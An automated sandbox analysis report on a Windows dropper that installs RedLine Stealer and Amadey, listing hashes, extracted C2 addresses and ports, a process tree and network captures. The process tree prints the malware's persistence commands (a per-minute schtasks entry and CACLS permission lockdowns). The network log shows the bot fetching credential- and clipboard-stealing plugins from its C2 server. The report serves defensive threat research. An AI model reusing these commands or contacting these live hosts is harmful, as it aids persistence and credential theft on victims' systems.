Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/02/2023, 09:42 UTC

General

  • Target

    f5ad1e15e1211b60c066c1d924ff9c6a.exe

  • Size

    715KB

  • MD5

    f5ad1e15e1211b60c066c1d924ff9c6a

  • SHA1

    bd0abd13667843f4551c9b2940ec7b46ec811d02

  • SHA256

    ec7c4f05150f213e7be63cec7528aa7660acb543d4986c4e0aad7c90a2131889

  • SHA512

    d94662eaa93088ae89dd270b61f824bb5e3765c2402f30cd0d1f17401b431cc5df3eea112fddecb3329012d47365ce207b387acc2cad411d89158171830ee013

  • SSDEEP

    12288:4Mr7y90GH9osJXyscMZOqq2b+/1L0WSfAvD8aJPgHfLD1vr1bzgAnNMUkNj1m:TyHHNy7ca/14WAAvD8OOly4Mb4

Malware Config

Extracted

Family

redline

Botnet

fukia

C2

193.233.20.13:4136

Attributes
  • auth_value

    e5783636fbd9e4f0cf9a017bce02e67e

Extracted

Family

amadey

Version

3.66

C2

62.204.41.5/Bu58Ngs/index.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 8 IoCs
  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 45 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe
    "C:\Users\Admin\AppData\Local\Temp\f5ad1e15e1211b60c066c1d924ff9c6a.exe"
    1⤵
    • Adds Run key to start application
    • Suspicious use of WriteProcessMemory
    PID:4916
    • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:4876
      • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:4480
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1684
        • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2132
          • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
            "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:2752
            • C:\Windows\SysWOW64\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe" /F
              6⤵
              • Creates scheduled task(s)
              PID:4072
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "Admin:N"&&CACLS "mnolyk.exe" /P "Admin:R" /E&&echo Y|CACLS "..\5eb6b96734" /P "Admin:N"&&CACLS "..\5eb6b96734" /P "Admin:R" /E&&Exit
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                7⤵
                  PID:5048
                • C:\Windows\SysWOW64\cacls.exe
                  CACLS "mnolyk.exe" /P "Admin:N"
                  7⤵
                    PID:3048
                  • C:\Windows\SysWOW64\cacls.exe
                    CACLS "mnolyk.exe" /P "Admin:R" /E
                    7⤵
                      PID:2136
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      7⤵
                        PID:1756
                      • C:\Windows\SysWOW64\cacls.exe
                        CACLS "..\5eb6b96734" /P "Admin:N"
                        7⤵
                          PID:4216
                        • C:\Windows\SysWOW64\cacls.exe
                          CACLS "..\5eb6b96734" /P "Admin:R" /E
                          7⤵
                            PID:4060
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
                          6⤵
                          • Loads dropped DLL
                          PID:2944
                  • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe
                    3⤵
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    PID:368
              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:2364
              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe
                1⤵
                • Executes dropped EXE
                PID:648

              Network

              • flag-ru
                POST
                http://62.204.41.5/Bu58Ngs/index.php
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                POST /Bu58Ngs/index.php HTTP/1.1
                Content-Type: application/x-www-form-urlencoded
                Host: 62.204.41.5
                Content-Length: 89
                Cache-Control: no-cache
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:42:28 GMT
                Content-Type: text/html; charset=UTF-8
                Transfer-Encoding: chunked
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                GET /Bu58Ngs/Plugins/cred64.dll HTTP/1.1
                Host: 62.204.41.5
                Response
                HTTP/1.1 404 Not Found
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:43:17 GMT
                Content-Type: text/html
                Content-Length: 162
                Connection: keep-alive
              • flag-ru
                GET
                http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
                mnolyk.exe
                Remote address:
                62.204.41.5:80
                Request
                GET /Bu58Ngs/Plugins/clip64.dll HTTP/1.1
                Host: 62.204.41.5
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.18.0 (Ubuntu)
                Date: Tue, 14 Feb 2023 09:43:17 GMT
                Content-Type: application/octet-stream
                Content-Length: 91136
                Last-Modified: Fri, 03 Feb 2023 16:52:27 GMT
                Connection: keep-alive
                ETag: "63dd3bcb-16400"
                Accept-Ranges: bytes
              • 193.233.20.13:4136
                kHp83aI.exe
                3.9MB
                53.2kB
                2878
                1175
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                5
              • 62.204.41.5:80
                http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll
                http
                mnolyk.exe
                3.8kB
                94.9kB
                76
                75

                HTTP Request

                POST http://62.204.41.5/Bu58Ngs/index.php

                HTTP Response

                200

                HTTP Request

                GET http://62.204.41.5/Bu58Ngs/Plugins/cred64.dll

                HTTP Response

                404

                HTTP Request

                GET http://62.204.41.5/Bu58Ngs/Plugins/clip64.dll

                HTTP Response

                200
              • 72.21.81.240:80
                322 B
                7
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                5
              • 104.80.225.205:443
                322 B
                7
              • 72.21.81.240:80
                322 B
                7
              • 72.21.81.240:80
                322 B
                7
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                5
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                5
              • 193.233.20.12:4132
                nmb57Na.exe
                260 B
                5
              • 193.233.20.12:4132
                nmb57Na.exe
                52 B
                1
              No results found

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Local\Temp\5eb6b96734\mnolyk.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe

                Filesize

                612KB

                MD5

                7094ab66eeb5c57922739891f528af69

                SHA1

                4f0c74da394ab5d4098e797b429b29289a240b66

                SHA256

                69735b510790de25e419be9affb0d42fd4305d43dbd97f02433f6ae218387150

                SHA512

                e6bc6b0711e98a0dd27ce261eb981982484b37447deca9ccec9727f90f1b95a8b9c0b6f7ead88ecdce459441e0a7c13e39bbbb57dc83f349f7439dc329ae58fb

              • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\spH05zC.exe

                Filesize

                612KB

                MD5

                7094ab66eeb5c57922739891f528af69

                SHA1

                4f0c74da394ab5d4098e797b429b29289a240b66

                SHA256

                69735b510790de25e419be9affb0d42fd4305d43dbd97f02433f6ae218387150

                SHA512

                e6bc6b0711e98a0dd27ce261eb981982484b37447deca9ccec9727f90f1b95a8b9c0b6f7ead88ecdce459441e0a7c13e39bbbb57dc83f349f7439dc329ae58fb

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe

                Filesize

                279KB

                MD5

                b7bb700e5a7a0c61fb93590366fe6ab9

                SHA1

                39a45f5aefb163427aa29ffcbdf130017cd52e62

                SHA256

                1516fc2758b409c7d53002665c888d62ac481d89679f4738c7d05cc672de319e

                SHA512

                605e922a2acb2008468dbe20f678b73af11a689d4081827f1ede264b4b9921b2579df2c56f70e196b793a5089805936a40aa1f886122ace11d05fb6259463319

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nmb57Na.exe

                Filesize

                279KB

                MD5

                b7bb700e5a7a0c61fb93590366fe6ab9

                SHA1

                39a45f5aefb163427aa29ffcbdf130017cd52e62

                SHA256

                1516fc2758b409c7d53002665c888d62ac481d89679f4738c7d05cc672de319e

                SHA512

                605e922a2acb2008468dbe20f678b73af11a689d4081827f1ede264b4b9921b2579df2c56f70e196b793a5089805936a40aa1f886122ace11d05fb6259463319

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe

                Filesize

                286KB

                MD5

                43d2f820b61628a4b22d28b66f047c09

                SHA1

                5b3becd2e875d39476fe74c224f00b646a89bfb8

                SHA256

                96f3eed77fb20dccbb3b3c6878f3bd2d5910cd90ed95452a7e539b29896cb085

                SHA512

                d432aaaef84846b4cc206e10364d4fc435261890095654964b863788354d86768a2941b0174dbd6820c4c1d26ac92a5dd3535b370e108b86293c473c25655c63

              • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\sMS71xF.exe

                Filesize

                286KB

                MD5

                43d2f820b61628a4b22d28b66f047c09

                SHA1

                5b3becd2e875d39476fe74c224f00b646a89bfb8

                SHA256

                96f3eed77fb20dccbb3b3c6878f3bd2d5910cd90ed95452a7e539b29896cb085

                SHA512

                d432aaaef84846b4cc206e10364d4fc435261890095654964b863788354d86768a2941b0174dbd6820c4c1d26ac92a5dd3535b370e108b86293c473c25655c63

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe

                Filesize

                175KB

                MD5

                a5f5c5d6291c7ae9e1d1b7ed1e551490

                SHA1

                3d06413341893b838549939e15f8f1eec423d71a

                SHA256

                1a09ce1cb64219a5d88e57845dc9ba6631efa06fccc8867ccf94eb132947563e

                SHA512

                d9b3ba67bdd615ee2ce91a29cd9cf6723464be27bf45186fd0e9559ff2b0e7c51b423cfc3e32b5e90955046fb75a34c4a8528df7294b6c831ca254a65d2b8ba2

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kHp83aI.exe

                Filesize

                175KB

                MD5

                a5f5c5d6291c7ae9e1d1b7ed1e551490

                SHA1

                3d06413341893b838549939e15f8f1eec423d71a

                SHA256

                1a09ce1cb64219a5d88e57845dc9ba6631efa06fccc8867ccf94eb132947563e

                SHA512

                d9b3ba67bdd615ee2ce91a29cd9cf6723464be27bf45186fd0e9559ff2b0e7c51b423cfc3e32b5e90955046fb75a34c4a8528df7294b6c831ca254a65d2b8ba2

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\mTJ79.exe

                Filesize

                236KB

                MD5

                fde8915d251fada3a37530421eb29dcf

                SHA1

                44386a8947ddfab993409945dae05a772a13e047

                SHA256

                6cbcf0bb90ae767a8c554cdfa90723e6b1127e98cfa19a2259dd57813d27e116

                SHA512

                ffc253ad4308c7a34ec5ced45cc5eda21a43a9fa59927a323829e2e87a0060c93a051c726f2f6f65ffdb8ac9666f88bf2622c975a24a6718c99ac9a44c6fd7fd

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                9221a421a3e777eb7d4ce55e474bcc4a

                SHA1

                c96d7bd7ccbf9352d50527bff472595b3dc5298e

                SHA256

                10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8

                SHA512

                63ac172cb19c7c020676937cb35e853710d08e99e06e8cdcb410c37e0c9056af409a50fdec0c90a3c532edcf5e0f128fa1e2181063e1208d4fc4643b1b5736f3

              • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

                Filesize

                89KB

                MD5

                9221a421a3e777eb7d4ce55e474bcc4a

                SHA1

                c96d7bd7ccbf9352d50527bff472595b3dc5298e

                SHA256

                10ee53988bcfbb4bb9c8928ea96c4268bd64b9dfd1f28c6233185e695434d2f8

                SHA512

                63ac172cb19c7c020676937cb35e853710d08e99e06e8cdcb410c37e0c9056af409a50fdec0c90a3c532edcf5e0f128fa1e2181063e1208d4fc4643b1b5736f3

              • memory/368-171-0x0000000000850000-0x000000000089B000-memory.dmp

                Filesize

                300KB

              • memory/368-170-0x0000000000933000-0x0000000000962000-memory.dmp

                Filesize

                188KB

              • memory/368-172-0x0000000000400000-0x00000000007A1000-memory.dmp

                Filesize

                3.6MB

              • memory/368-173-0x0000000000933000-0x0000000000962000-memory.dmp

                Filesize

                188KB

              • memory/1684-143-0x0000000004BD0000-0x0000000004CDA000-memory.dmp

                Filesize

                1.0MB

              • memory/1684-144-0x0000000004B00000-0x0000000004B12000-memory.dmp

                Filesize

                72KB

              • memory/1684-152-0x00000000068A0000-0x00000000068F0000-memory.dmp

                Filesize

                320KB

              • memory/1684-151-0x0000000006820000-0x0000000006896000-memory.dmp

                Filesize

                472KB

              • memory/1684-150-0x0000000006AB0000-0x0000000006FDC000-memory.dmp

                Filesize

                5.2MB

              • memory/1684-149-0x00000000063B0000-0x0000000006572000-memory.dmp

                Filesize

                1.8MB

              • memory/1684-148-0x0000000004FB0000-0x0000000005016000-memory.dmp

                Filesize

                408KB

              • memory/1684-147-0x0000000005670000-0x0000000005702000-memory.dmp

                Filesize

                584KB

              • memory/1684-141-0x0000000000130000-0x0000000000162000-memory.dmp

                Filesize

                200KB

              • memory/1684-142-0x0000000005050000-0x0000000005668000-memory.dmp

                Filesize

                6.1MB

              • memory/1684-145-0x0000000004B80000-0x0000000004BBC000-memory.dmp

                Filesize

                240KB

              • memory/1684-146-0x0000000005C20000-0x00000000061C4000-memory.dmp

                Filesize

                5.6MB

              We care about your privacy.

              This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.